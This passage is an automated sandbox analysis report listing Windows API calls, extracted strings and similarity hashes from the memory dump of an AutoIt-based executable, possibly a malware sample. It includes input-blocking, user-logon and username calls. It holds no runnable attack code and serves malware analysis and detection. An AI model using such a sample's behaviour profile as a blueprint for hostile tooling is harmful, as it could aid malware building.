                                              • Instruction Fuzzy Hash: 61E04F31010600EFE7212B14EC08E7377EDEB043217158C59F895804B0CB215C90DB10
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B58F87,?,?,?,00000001), ref: 00B5A38A
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B5A393
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: c86a002b86ccc52b5a48307b55a77f51775da6adfb55bb60abe442094dddd70f
                                              • Instruction ID: 41676a6739b611880e576813d5dcffaa0ac24fb671c9c78a2c6af25ecd27d5ad
                                              • Opcode Fuzzy Hash: c86a002b86ccc52b5a48307b55a77f51775da6adfb55bb60abe442094dddd70f
                                              • Instruction Fuzzy Hash: C8B09231074248EBCA403B91EC09F883F68EBCCA62F004010FA1D46060CF6254508A99
                                              APIs
                                              • BlockInput.USER32(00000001), ref: 00BA45F0
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BlockInput
                                              • String ID:
                                              • API String ID: 3456056419-0
                                              • Opcode ID: 74b763f028d302366ba5f820c97abbdb7ae0a86575934f6187eb168d08b56f4e
                                              • Instruction ID: e9b22f1658f3fe9577c7b067e8751c757eb56bca224b07111d8ce8048754f9eb
                                              • Opcode Fuzzy Hash: 74b763f028d302366ba5f820c97abbdb7ae0a86575934f6187eb168d08b56f4e
                                              • Instruction Fuzzy Hash: B9E09A312102099FC310AF5AE800A8AB7E8AFA8760F008066FC09C7310DBB0AC008B90
                                              APIs
                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00B95205
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: mouse_event
                                              • String ID:
                                              • API String ID: 2434400541-0
                                              • Opcode ID: 6b235a41609c77da06a8831ebd378bbbc842cb11471217f12ccca7fe2fe334a6
                                              • Instruction ID: 56cac5cae50da14068d07cd23823cd39a056ad025e4bd19db1f6b918c7525246
                                              • Opcode Fuzzy Hash: 6b235a41609c77da06a8831ebd378bbbc842cb11471217f12ccca7fe2fe334a6
                                              • Instruction Fuzzy Hash: 5ED05E941E0E2979EC3A03248E0FF361688E3007C0FA441E97802A50C1ECD05C819631
                                              APIs
                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00B88FA7), ref: 00B89389
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: LogonUser
                                              • String ID:
                                              • API String ID: 1244722697-0
                                              • Opcode ID: 949d073fff8357624b352bf444bc092619457c3b12066e4e851dc239e30bb290
                                              • Instruction ID: f4be40055b1b9b6b99afc8ccd4e4cfecc9fadeb8e19d10c4bba74c479cc47f0b
                                              • Opcode Fuzzy Hash: 949d073fff8357624b352bf444bc092619457c3b12066e4e851dc239e30bb290
                                              • Instruction Fuzzy Hash: C8D09E3226450EABEF019EA4DD05EAE3B69EB04B01F408511FE15D61A1C775D935AB60
                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?), ref: 00B70734
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: NameUser
                                              • String ID:
                                              • API String ID: 2645101109-0
                                              • Opcode ID: c36cf567e33594d10ac4f985748d3e5ee222aca585014907acaf8fcae085a327
                                              • Instruction ID: d3d9a4cfe985ccaf34552f6d4082874c33870f4c60f9abc572bbdac2ba11c2ea
                                              • Opcode Fuzzy Hash: c36cf567e33594d10ac4f985748d3e5ee222aca585014907acaf8fcae085a327
                                              • Instruction Fuzzy Hash: 26C04CF182010DDBCB05EBA0D988EEE77BCAB08314F114056E115B2100D7749B448A71
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B5A35A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: cad0b2d8dcdb4262a5f3d5d340b70e9ea20a0a3780229ffa391d8445f4a9af5e
                                              • Instruction ID: 7558be1ec7cf513b214eac6b0c786684e788cbf9b314127dd19399f2775f157d
                                              • Opcode Fuzzy Hash: cad0b2d8dcdb4262a5f3d5d340b70e9ea20a0a3780229ffa391d8445f4a9af5e
                                              • Instruction Fuzzy Hash: 52A0113002020CEB8A002B82EC08888BFACEA882A0B008020F80C020228B32A8208A88
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00BA7F45
                                              • DeleteObject.GDI32(00000000), ref: 00BA7F57
                                              • DestroyWindow.USER32 ref: 00BA7F65
                                              • GetDesktopWindow.USER32 ref: 00BA7F7F
                                              • GetWindowRect.USER32(00000000), ref: 00BA7F86
                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00BA80C7
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00BA80D7
                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA811F
                                              • GetClientRect.USER32(00000000,?), ref: 00BA812B
                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BA8165
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA8187
                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA819A
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA81A5
                                              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA81AE
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA81BD
                                              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA81C6
                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA81CD
                                              • GlobalFree.KERNEL32(00000000), ref: 00BA81D8
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA81EA
                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00BC3C7C,00000000), ref: 00BA8200
                                              • GlobalFree.KERNEL32(00000000), ref: 00BA8210
                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00BA8236
                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00BA8255
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA8277
                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA8464
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                              • String ID: $AutoIt v3$DISPLAY$static
                                              • API String ID: 2211948467-2373415609
                                              • Opcode ID: 6fd7d45649a43e95d6a63be65249590c43591fdfcdf152a7015a2c5d55732ea2
                                              • Instruction ID: 984c7896ae847492f0a62aeb42c93db905609fc736ac3619b26d3af44680d0d6
                                              • Opcode Fuzzy Hash: 6fd7d45649a43e95d6a63be65249590c43591fdfcdf152a7015a2c5d55732ea2
                                              • Instruction Fuzzy Hash: A0025D71910119EFDB14EF64CC89EAEBBF9FB49310F148199F915AB2A1CB31AD41CB60
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,00BC0980), ref: 00BB3C65
                                              • IsWindowVisible.USER32(?), ref: 00BB3C89
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharUpperVisibleWindow
                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                              • API String ID: 4105515805-45149045
                                              • Opcode ID: 5c1943d945c6359aec40623535adbae7c208e906f7b4f0d517d263141d6e4c52
                                              • Instruction ID: 982652d5066295cc527ecc89dd0223b2eeca81b53c5d76d751fd19015485e0d1
                                              • Opcode Fuzzy Hash: 5c1943d945c6359aec40623535adbae7c208e906f7b4f0d517d263141d6e4c52
                                              • Instruction Fuzzy Hash: 38D16C302142158BCB14FF50C591ABABBF5EF94744F2448E8F8965B2E2CB71EE4ACB51
                                              APIs
                                              • SetTextColor.GDI32(?,00000000), ref: 00BBAC55
                                              • GetSysColorBrush.USER32(0000000F), ref: 00BBAC86
                                              • GetSysColor.USER32(0000000F), ref: 00BBAC92
                                              • SetBkColor.GDI32(?,000000FF), ref: 00BBACAC
                                              • SelectObject.GDI32(?,?), ref: 00BBACBB
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00BBACE6
                                              • GetSysColor.USER32(00000010), ref: 00BBACEE
                                              • CreateSolidBrush.GDI32(00000000), ref: 00BBACF5
                                              • FrameRect.USER32(?,?,00000000), ref: 00BBAD04
                                              • DeleteObject.GDI32(00000000), ref: 00BBAD0B
                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00BBAD56
                                              • FillRect.USER32(?,?,?), ref: 00BBAD88
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BBADB3
                                                • Part of subcall function 00BBAF18: GetSysColor.USER32(00000012), ref: 00BBAF51
                                                • Part of subcall function 00BBAF18: SetTextColor.GDI32(?,?), ref: 00BBAF55
                                                • Part of subcall function 00BBAF18: GetSysColorBrush.USER32(0000000F), ref: 00BBAF6B
                                                • Part of subcall function 00BBAF18: GetSysColor.USER32(0000000F), ref: 00BBAF76
                                                • Part of subcall function 00BBAF18: GetSysColor.USER32(00000011), ref: 00BBAF93
                                                • Part of subcall function 00BBAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BBAFA1
                                                • Part of subcall function 00BBAF18: SelectObject.GDI32(?,00000000), ref: 00BBAFB2
                                                • Part of subcall function 00BBAF18: SetBkColor.GDI32(?,00000000), ref: 00BBAFBB
                                                • Part of subcall function 00BBAF18: SelectObject.GDI32(?,?), ref: 00BBAFC8
                                                • Part of subcall function 00BBAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00BBAFE7
                                                • Part of subcall function 00BBAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BBAFFE
                                                • Part of subcall function 00BBAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00BBB013
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                              • String ID:
                                              • API String ID: 4124339563-0
                                              • Opcode ID: 9cc1fce89f86b8687b22a52971c320940386d602366cd1c72272d24d5fcaedef
                                              • Instruction ID: 288945597c04a5a82ea334d06d26770a2ae8571b881cc1cc4fea36047c8f39c7
                                              • Opcode Fuzzy Hash: 9cc1fce89f86b8687b22a52971c320940386d602366cd1c72272d24d5fcaedef
                                              • Instruction Fuzzy Hash: 64A16C72418301EFD711AF64DC48EABBBE9FF88321F140A29F966971A0DB71D944CB52
                                              APIs
                                              • DestroyWindow.USER32(?,?,?), ref: 00B33072
                                              • DeleteObject.GDI32(00000000), ref: 00B330B8
                                              • DeleteObject.GDI32(00000000), ref: 00B330C3
                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00B330CE
                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00B330D9
                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B6C77C
                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B6C7B5
                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B6CBDE
                                                • Part of subcall function 00B31F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B32412,?,00000000,?,?,?,?,00B31AA7,00000000,?), ref: 00B31F76
                                              • SendMessageW.USER32(?,00001053), ref: 00B6CC1B
                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B6CC32
                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B6CC48
                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B6CC53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                              • String ID: 0
                                              • API String ID: 464785882-4108050209
                                              • Opcode ID: 6ddef694815aaa2ef65798f3e30b2da07a771cd3004157af819c7d5fbab4cadf
                                              • Instruction ID: 215ab87f765759747140270aab1dad00bb4e86b55332bf249535413b2d3cd7b0
                                              • Opcode Fuzzy Hash: 6ddef694815aaa2ef65798f3e30b2da07a771cd3004157af819c7d5fbab4cadf
                                              • Instruction Fuzzy Hash: 86128D34604201EFDB25DF24C885BBABBE5FF08710F2445A9E999CB262CB35ED41CB91
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                              • API String ID: 2660009612-1645009161
                                              • Opcode ID: baf005d9e1cc8dffe65a8656ca7753d3e20c27916a0a441f6836134ef3a80666
                                              • Instruction ID: 364c8d2a802782d80e8033a6583f878a09d208c96729cfdf83ef754f39a3c5a2
                                              • Opcode Fuzzy Hash: baf005d9e1cc8dffe65a8656ca7753d3e20c27916a0a441f6836134ef3a80666
                                              • Instruction Fuzzy Hash: 10A19F70A0020AABCB11AF65DC82FBE37E4EF54B40F5440E9FC15AB292EB719B55E750
                                              APIs
                                              • DestroyWindow.USER32(00000000), ref: 00BA7BC8
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00BA7C87
                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00BA7CC5
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00BA7CD7
                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00BA7D1D
                                              • GetClientRect.USER32(00000000,?), ref: 00BA7D29
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00BA7D6D
                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00BA7D7C
                                              • GetStockObject.GDI32(00000011), ref: 00BA7D8C
                                              • SelectObject.GDI32(00000000,00000000), ref: 00BA7D90
                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00BA7DA0
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BA7DA9
                                              • DeleteDC.GDI32(00000000), ref: 00BA7DB2
                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00BA7DDE
                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00BA7DF5
                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00BA7E30
                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00BA7E44
                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00BA7E55
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00BA7E85
                                              • GetStockObject.GDI32(00000011), ref: 00BA7E90
                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00BA7E9B
                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00BA7EA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                              • API String ID: 2910397461-517079104
                                              • Opcode ID: b25497bfb843a1aae3526d5718687bc4b8f230cce980da616c4ba78542620492
                                              • Instruction ID: 26c13c593eb74e45edc9f9aafec4617aec5147fd0414b1e6428e27d6073585eb
                                              • Opcode Fuzzy Hash: b25497bfb843a1aae3526d5718687bc4b8f230cce980da616c4ba78542620492
                                              • Instruction Fuzzy Hash: 0CA16271A54219BFEB14DB68DC4AFAF7BB9EB09710F144154FA15A72E0DB70AD00CB60
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00B9B361
                                              • GetDriveTypeW.KERNEL32(?,00BC2C4C,?,\\.\,00BC0980), ref: 00B9B43E
                                              • SetErrorMode.KERNEL32(00000000,00BC2C4C,?,\\.\,00BC0980), ref: 00B9B59C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DriveType
                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                              • API String ID: 2907320926-4222207086
                                              • Opcode ID: dafa65ee74677fd66ef5d1f1865f94418d2862382c166b5f3636abf0b9c935fd
                                              • Instruction ID: 1c547464734cd6875dc00d701bce3462ec8d2c10393a07c1c4d0bc7d36f513bf
                                              • Opcode Fuzzy Hash: dafa65ee74677fd66ef5d1f1865f94418d2862382c166b5f3636abf0b9c935fd
                                              • Instruction Fuzzy Hash: A151A430B44209EBCF00EB61EAD2E7E77E0EB54740B2540F5E406A76B1DB71AE81DB55
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00BBA0F7
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00BBA1B0
                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 00BBA1CC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: 0
                                              • API String ID: 2326795674-4108050209
                                              • Opcode ID: fa54b2223e3d11fd21be7ee1bea13415dac198f18d39d9331ec2dd86b810a3d3
                                              • Instruction ID: 2b040a923ac5216d288e09c0cb9042adf5abbc89cf2ea7fd9f52be32c5ccd61a
